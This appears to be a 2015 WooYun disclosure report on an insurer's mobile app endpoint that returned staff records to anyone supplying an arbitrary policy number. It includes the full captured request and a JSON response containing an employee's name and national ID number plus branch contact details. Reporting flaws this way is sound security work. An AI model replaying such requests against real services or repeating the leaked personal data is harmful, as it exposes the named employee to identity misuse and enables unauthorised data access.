当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134399

漏洞标题:太平洋保险app某处泄漏员工敏感信息

相关厂商:太平洋保险

漏洞作者: prolog

提交时间:2015-08-16 10:02

修复时间:2015-10-04 15:12

公开时间:2015-10-04 15:12

漏洞类型:敏感信息泄露

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-16: 细节已通知厂商并且等待厂商处理中
2015-08-20: 厂商已经确认,细节仅向厂商公开
2015-08-30: 细节向核心白帽子及相关领域专家公开
2015-09-09: 细节向普通白帽子公开
2015-09-19: 细节向实习白帽子公开
2015-10-04: 细节向公众公开

简要描述:

太平洋保险app某处泄漏员工敏感信息

详细说明:

版本

Screenshot_2015-08-15-23-26-39.png


选车险服务

Screenshot_2015-08-15-23-21-54.png


选临牌批改

Screenshot_2015-08-15-23-22-03.png.jpg


随便选地区,保单号随便输够20个数字

Screenshot_2015-08-15-23-23-10.png


抓包,该接口泄漏不同地区的员工信息,部分含有姓名,身份证

POST https://vicp.ecpic.com.cn/sxcb/phone/customer/getUserInfo.do HTTP/1.1
Host: vicp.ecpic.com.cn
Connection: keep-alive
Content-Length: 159
Origin: https://vicp.ecpic.com.cn
appType: C
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; Nexus 5 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: application/json
X-Requested-With: XMLHttpRequest
clientType: phone
Referer: https://vicp.ecpic.com.cn/public/carnoModify/policyNoSearch.html
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,en-US;q=0.8
Cookie: isiPhoneApp=false; JSESSIONID=0000gBHqw0DU18rWK7e2uFfh-C-:196cm5e70
signature=995bba0c44a5879212ae760a680be878ef52d8078a0f9b1cbc45b20d3691edcf&timestamp=1439651748209&province=%E5%AE%89%E5%BE%BD&city=%E5%AE%89%E5%BA%86%E5%B8%82


{
    "success":true,
    "errcode":"0",
    "error":"",
    "userInfo":{
  "user": {
    "psPkey": 80746617,
    "psLoginname": "AQ975",
    "psName": "安庆本部电销",
    "psId": "AQ975",
    "psCountry": "China",
    "psProvince": "China",
    "psCity": "China",
    "psValid": "Y",
    "psModifydate": "2015-08-03 10:23:20",
    "psModifyuser": 1,
    "psType": "B1",
    "psOrgFkey": 80735683,
    "unitCode": "3050100",
    "isFirstLogin": "Y",
    "isLoginLock": "N",
    "permitSave": "Y",
    "permitUnderwrite": "Y",
    "permitFloat": "N"
  },
  "userOrgInfo": {
    "ogPkey": 80735683,
    "ogOrganizationid": "529",
    "ogOrganizationtype": "-1",
    "ogName": "营业部",
    "ogCountry": "中国",
    "ogAttribute": "004",
    "ogValid": "Y",
    "ogModifydate": "2015-07-17 16:00:06",
    "ogModifyuser": 1,
    "p09InpModel": 2,
    "ogParent": 80735664,
    "unitCode": "3050100"
  },
  "orgs": {
    "004": {
      "ogPkey": 80735683,
      "ogOrganizationid": "529",
      "ogOrganizationtype": "-1",
      "ogName": "营业部",
      "ogCountry": "中国",
      "ogAttribute": "004",
      "ogValid": "Y",
      "ogModifydate": "2015-07-17 16:00:06",
      "ogModifyuser": 1,
      "p09InpModel": 2,
      "ogParent": 80735664,
      "unitCode": "3050100"
    },
    "003": {
      "ogPkey": 80735664,
      "ogOrganizationid": "529",
      "ogOrganizationtype": "-1",
      "ogName": "营业部",
      "ogPhone": "0556-5317711",
      "ogCountry": "中国",
      "ogAddress": "安庆市宜秀区中兴大街中段菱北办公楼",
      "ogPostcode": "246005",
      "ogAttribute": "003",
      "ogValid": "Y",
      "ogModifydate": "2015-08-14 20:30:34",
      "ogModifyuser": 1,
      "p09InpModel": 2,
      "ogParent": 80000251,
      "unitCode": "3050100"
    },
    "002": {
      "ogPkey": 80000251,
      "ogOrganizationid": "340800",
      "ogOrganizationtype": "-1",
      "ogName": "安庆中心支公司",
      "ogAbbrname": "ANQING SUBBRANCH",
      "ogPhone": "0556-5317711",
      "ogFax": "0556-5325726",
      "ogCountry": "中国",
      "ogCity": "安庆",
      "ogAddress": "安庆市宜秀区中兴大街中段菱北办公楼",
      "ogPostcode": "246005",
      "ogAttribute": "002",
      "ogValid": "Y",
      "ogModifydate": "2015-08-14 20:30:04",
      "ogModifyuser": 1,
      "p09InpModel": 2,
      "ogParent": 80000040,
      "unitCode": "3050100"
    },
    "001": {
      "ogPkey": 80000040,
      "ogOrganizationid": "3050100",
      "ogOrganizationtype": "-1",
      "ogName": "安徽分公司",
      "ogAbbrname": "HEF",
      "ogPhone": "0551-65549637",
      "ogCountry": "中国",
      "ogAddress": "合肥市阜阳北路1号",
      "ogPostcode": "230041",
      "ogAttribute": "001",
      "ogValid": "Y",
      "ogModifydate": "2015-08-14 20:30:03",
      "ogModifyuser": 1,
      "p09InpModel": 2,
      "ogParent": -1,
      "unitCode": "3050100"
    },
    "005": {}
  }
},
    "inputorInfo":{
  "user": {
    "psPkey": 80722262,
    "psLoginname": "AQ874",
    "psName": "张静",
    "psId": "AQ874",
    "psIdcardnum": "340803198611062241",
    "psCountry": "China",
    "psProvince": "China",
    "psCity": "China",
    "psValid": "Y",
    "psModifydate": "2015-07-02 15:35:14",
    "psModifyuser": 1,
    "psType": "I",
    "psOrgFkey": 80735679,
    "unitCode": "3050100",
    "isFirstLogin": "Y",
    "isLoginLock": "N",
    "permitSave": "Y",
    "permitUnderwrite": "Y",
    "permitFloat": "N"
  },
  "userOrgInfo": {
    "ogPkey": 80735679,
    "ogOrganizationid": "525",
    "ogOrganizationtype": "-1",
    "ogName": "非车险部",
    "ogCountry": "中国",
    "ogAttribute": "004",
    "ogValid": "Y",
    "ogModifydate": "2015-07-17 16:00:06",
    "ogModifyuser": 1,
    "p09InpModel": 2,
    "ogParent": 80735660,
    "unitCode": "3050100"
  },
  "orgs": {
    "004": {
      "ogPkey": 80735679,
      "ogOrganizationid": "525",
      "ogOrganizationtype": "-1",
      "ogName": "非车险部",
      "ogCountry": "中国",
      "ogAttribute": "004",
      "ogValid": "Y",
      "ogModifydate": "2015-07-17 16:00:06",
      "ogModifyuser": 1,
      "p09InpModel": 2,
      "ogParent": 80735660,
      "unitCode": "3050100"
    },
    "003": {
      "ogPkey": 80735660,
      "ogOrganizationid": "525",
      "ogOrganizationtype": "-1",
      "ogName": "非车险部",
      "ogPhone": "0556-5325727",
      "ogCountry": "中国",
      "ogAddress": "安庆市宜秀区中兴大街中段菱北办公楼",
      "ogPostcode": "246005",
      "ogAttribute": "003",
      "ogValid": "Y",
      "ogModifydate": "2015-08-14 20:30:34",
      "ogModifyuser": 1,
      "p09InpModel": 2,
      "ogParent": 80000251,
      "unitCode": "3050100"
    },
    "002": {
      "ogPkey": 80000251,
      "ogOrganizationid": "340800",
      "ogOrganizationtype": "-1",
      "ogName": "安庆中心支公司",
      "ogAbbrname": "ANQING SUBBRANCH",
      "ogPhone": "0556-5317711",
      "ogFax": "0556-5325726",
      "ogCountry": "中国",
      "ogCity": "安庆",
      "ogAddress": "安庆市宜秀区中兴大街中段菱北办公楼",
      "ogPostcode": "246005",
      "ogAttribute": "002",
      "ogValid": "Y",
      "ogModifydate": "2015-08-14 20:30:04",
      "ogModifyuser": 1,
      "p09InpModel": 2,
      "ogParent": 80000040,
      "unitCode": "3050100"
    },
    "001": {
      "ogPkey": 80000040,
      "ogOrganizationid": "3050100",
      "ogOrganizationtype": "-1",
      "ogName": "安徽分公司",
      "ogAbbrname": "HEF",
      "ogPhone": "0551-65549637",
      "ogCountry": "中国",
      "ogAddress": "合肥市阜阳北路1号",
      "ogPostcode": "230041",
      "ogAttribute": "001",
      "ogValid": "Y",
      "ogModifydate": "2015-08-14 20:30:03",
      "ogModifyuser": 1,
      "p09InpModel": 2,
      "ogParent": -1,
      "unitCode": "3050100"
    },
    "005": {}
  }
},
    "salemans":[
	    
    ] 
}


wwah.PNG


sahsh.PNG


ehse.PNG


asharh.PNG


捕获.PNG


漏洞证明:

。。

修复方案:

。。

版权声明:转载请注明来源 prolog@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-08-20 15:10

厂商回复:

感谢提醒,已修复。

最新状态:

暂无